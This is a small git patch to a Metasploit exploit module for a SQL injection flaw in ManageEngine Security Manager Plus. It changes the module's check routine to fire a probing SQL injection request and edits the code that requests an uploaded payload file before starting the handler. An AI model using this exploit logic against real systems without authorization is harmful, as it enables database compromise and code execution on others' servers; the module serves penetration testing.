From f9bb910c3bd4e7d962ea1c8b61fa6913cd75451c Mon Sep 17 00:00:00 2001
From: sinn3r <msfsinn3r@gmail.com>
Date: Tue, 23 Oct 2012 19:42:36 -0500
Subject: [PATCH] Make the check() try SQLI

---
 .../exploits/multi/http/manageengine_search_sqli.rb  | 12 +++++-------
 1 file changed, 5 insertions(+), 7 deletions(-)

diff --git a/modules/exploits/multi/http/manageengine_search_sqli.rb b/modules/exploits/multi/http/manageengine_search_sqli.rb
index 6e79783ad2..c660de1ea4 100644
--- a/modules/exploits/multi/http/manageengine_search_sqli.rb
+++ b/modules/exploits/multi/http/manageengine_search_sqli.rb
@@ -52,14 +52,11 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 
-	#
-	# A very gentle check to see if Security Manager Plus exists or not
-	#
 	def check
-		res = send_request_raw({'uri' => '/SecurityManager.cc'})
+		res = sqli_exec(Rex::Text.rand_text_alpha(1))
 
-		if res and res.body =~ /\<title\>SecurityManager Plus\<\/title\>/
-			return Exploit::CheckCode::Detected
+		if res and res.body =~ /Error during search/
+			return Exploit::CheckCode::Appears
 		else
 			return Exploit::CheckCode::Safe
 		end
@@ -82,6 +79,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 		res = send_request_raw({'uri'=>"/#{rnd_fname}"})
 
+		# What @@version returns:
 		# Linux   = 5.0.36-enterprise
 		# Windows = 5.0.36-enterprise-nt
 
@@ -248,7 +246,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 		fname = "/#{File.basename(out)}"
 		print_status("#{rhost}:#{rport} - Requesting #{fname}")
-		res = send_request_raw({'uri' => fname})
+		send_request_raw({'uri' => fname})
 
 		handler
 	end